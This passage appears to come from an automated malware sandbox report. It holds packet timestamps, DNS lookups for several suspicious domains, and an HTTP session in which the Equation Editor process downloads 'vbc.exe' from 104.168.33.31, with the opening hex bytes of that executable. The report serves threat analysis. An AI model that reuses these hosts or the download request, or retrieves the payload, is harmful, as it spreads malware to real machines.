                                                      May 14, 2022 15:19:31.994713068 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994713068 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994752884 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994756937 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994797945 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994798899 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994837046 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994837999 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994878054 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994879007 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994920969 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994920969 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994961977 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994961977 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.995003939 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.998342037 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102241993 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102273941 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102289915 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102307081 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102318048 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102323055 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102341890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102345943 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102349997 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102359056 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102359056 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102374077 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102376938 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102390051 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102411032 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105182886 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105207920 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105225086 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105242014 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105246067 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105252981 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105269909 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105287075 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105300903 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105304003 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105307102 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105309963 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105313063 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105319977 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105324030 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105333090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105341911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105353117 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105365992 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105371952 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105392933 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105401993 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105410099 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105421066 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105426073 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105432987 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105443954 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105454922 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105460882 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105467081 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105479002 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105488062 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105495930 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105499029 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105513096 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105524063 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105530024 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105535984 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105557919 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.106884956 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111634016 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111661911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111679077 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111695051 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111711979 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111726046 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111737967 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111749887 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111754894 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111802101 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111820936 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111821890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111835003 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111843109 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111860991 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111869097 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111879110 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111881971 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111893892 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111897945 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111912966 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111916065 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111933947 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111938000 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111948013 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111953020 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111963034 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111970901 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111984015 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111988068 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111996889 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.112008095 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.112020016 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.112040043 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.113650084 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215792894 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215852976 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215889931 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215898991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215926886 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215926886 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215936899 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215962887 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215964079 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216000080 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216002941 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216038942 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216041088 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216073036 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216075897 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216109991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216111898 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216150045 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216150999 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216183901 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216187000 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216221094 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216223955 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216258049 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216262102 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216296911 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216300011 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216334105 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216336012 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216370106 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216372967 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216407061 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218668938 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218710899 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218745947 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218749046 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218770981 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218785048 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218789101 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218822002 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218823910 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218859911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218863964 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218895912 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218900919 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218931913 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218939066 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.218967915 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.218976974 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219006062 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219012022 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219042063 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219046116 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219086885 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219089985 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219125032 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219126940 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219163895 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219166040 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219202042 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219202995 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219238043 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219238997 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219273090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219274998 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219310045 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219311953 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219346046 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219357967 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219381094 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219383001 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219419003 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219419956 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219455004 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219458103 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219491005 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219492912 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219527960 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219531059 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219564915 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219567060 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219602108 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219603062 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219638109 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219640970 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219676971 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219677925 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219711065 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219716072 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219752073 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219753027 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219789028 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219808102 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219845057 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219851971 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219890118 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219891071 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219918966 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.219926119 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.219959021 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.220094919 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:37.160038948 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:37.160197020 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:38.759443998 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:20:49.280080080 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.297899961 CEST804917434.102.136.180192.168.2.22
                                                      May 14, 2022 15:20:49.298039913 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.298163891 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.315794945 CEST804917434.102.136.180192.168.2.22
                                                      May 14, 2022 15:20:49.414908886 CEST804917434.102.136.180192.168.2.22
                                                      May 14, 2022 15:20:49.414938927 CEST804917434.102.136.180192.168.2.22
                                                      May 14, 2022 15:20:49.415096045 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.415138960 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.721462965 CEST4917480192.168.2.2234.102.136.180
                                                      May 14, 2022 15:20:49.737354040 CEST804917434.102.136.180192.168.2.22
                                                      May 14, 2022 15:20:54.454102039 CEST4917580192.168.2.22198.54.117.212
                                                      May 14, 2022 15:20:54.627938032 CEST8049175198.54.117.212192.168.2.22
                                                      May 14, 2022 15:20:54.628040075 CEST4917580192.168.2.22198.54.117.212
                                                      May 14, 2022 15:20:54.628197908 CEST4917580192.168.2.22198.54.117.212
                                                      May 14, 2022 15:20:54.801981926 CEST8049175198.54.117.212192.168.2.22
                                                      May 14, 2022 15:20:54.802022934 CEST8049175198.54.117.212192.168.2.22
                                                      May 14, 2022 15:21:00.123545885 CEST4917680192.168.2.22164.155.217.57
                                                      May 14, 2022 15:21:00.311521053 CEST8049176164.155.217.57192.168.2.22
                                                      May 14, 2022 15:21:00.314990997 CEST4917680192.168.2.22164.155.217.57
                                                      May 14, 2022 15:21:00.315134048 CEST4917680192.168.2.22164.155.217.57
                                                      May 14, 2022 15:21:00.712800980 CEST8049176164.155.217.57192.168.2.22
                                                      May 14, 2022 15:21:00.731961012 CEST8049176164.155.217.57192.168.2.22
                                                      May 14, 2022 15:21:00.732011080 CEST8049176164.155.217.57192.168.2.22
                                                      May 14, 2022 15:21:00.732199907 CEST4917680192.168.2.22164.155.217.57
                                                      May 14, 2022 15:21:00.746476889 CEST4917680192.168.2.22164.155.217.57
                                                      May 14, 2022 15:21:00.932132006 CEST8049176164.155.217.57192.168.2.22
                                                      May 14, 2022 15:21:05.987340927 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.148293972 CEST804917723.81.214.26192.168.2.22
                                                      May 14, 2022 15:21:06.148436069 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.148781061 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.311940908 CEST804917723.81.214.26192.168.2.22
                                                      May 14, 2022 15:21:06.311974049 CEST804917723.81.214.26192.168.2.22
                                                      May 14, 2022 15:21:06.311989069 CEST804917723.81.214.26192.168.2.22
                                                      May 14, 2022 15:21:06.312130928 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.312165976 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.313327074 CEST4917780192.168.2.2223.81.214.26
                                                      May 14, 2022 15:21:06.474150896 CEST804917723.81.214.26192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 15:20:49.249929905 CEST5586853192.168.2.228.8.8.8
                                                      May 14, 2022 15:20:49.270263910 CEST53558688.8.8.8192.168.2.22
                                                      May 14, 2022 15:20:54.426791906 CEST4968853192.168.2.228.8.8.8
                                                      May 14, 2022 15:20:54.448314905 CEST53496888.8.8.8192.168.2.22
                                                      May 14, 2022 15:20:59.833756924 CEST5883653192.168.2.228.8.8.8
                                                      May 14, 2022 15:21:00.015923977 CEST53588368.8.8.8192.168.2.22
                                                      May 14, 2022 15:21:05.800946951 CEST5013453192.168.2.228.8.8.8
                                                      May 14, 2022 15:21:05.972409964 CEST53501348.8.8.8192.168.2.22
                                                      May 14, 2022 15:21:11.315015078 CEST5527553192.168.2.228.8.8.8
                                                      May 14, 2022 15:21:11.426719904 CEST53552758.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 14, 2022 15:20:49.249929905 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.arjimni.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.426791906 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.contractornurd.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:59.833756924 CEST192.168.2.228.8.8.80x1666Standard query (0)www.tw-life.netA (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:05.800946951 CEST192.168.2.228.8.8.80x723cStandard query (0)www.yiwanggkm.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:11.315015078 CEST192.168.2.228.8.8.80x150Standard query (0)www.skinclash.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 14, 2022 15:20:49.270263910 CEST8.8.8.8192.168.2.220xc4a9No error (0)www.arjimni.comarjimni.comCNAME (Canonical name)IN (0x0001)
                                                      May 14, 2022 15:20:49.270263910 CEST8.8.8.8192.168.2.220xc4a9No error (0)arjimni.com34.102.136.180A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.contractornurd.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                      May 14, 2022 15:20:54.448314905 CEST8.8.8.8192.168.2.220xca6dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:00.015923977 CEST8.8.8.8192.168.2.220x1666No error (0)www.tw-life.net164.155.217.57A (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:05.972409964 CEST8.8.8.8192.168.2.220x723cNo error (0)www.yiwanggkm.com23.81.214.26A (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:11.426719904 CEST8.8.8.8192.168.2.220x150No error (0)www.skinclash.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)
                                                      May 14, 2022 15:21:11.426719904 CEST8.8.8.8192.168.2.220x150No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                      May 14, 2022 15:21:11.426719904 CEST8.8.8.8192.168.2.220x150No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)
                                                      May 14, 2022 15:21:11.426719904 CEST8.8.8.8192.168.2.220x150No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • 104.168.33.31
                                                      • www.arjimni.com
                                                      • www.contractornurd.com
                                                      • www.tw-life.net
                                                      • www.yiwanggkm.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249173104.168.33.3180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      May 14, 2022 15:19:31.529700994 CEST2OUTGET /75/vbc.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 104.168.33.31
                                                      Connection: Keep-Alive
                                                      May 14, 2022 15:19:31.645406961 CEST3INHTTP/1.1 200 OK
                                                      Date: Sat, 14 May 2022 13:19:31 GMT
                                                      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                      Last-Modified: Fri, 13 May 2022 09:36:08 GMT
                                                      ETag: "4065c-5dee1677234a5"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 263772
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-msdownload
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 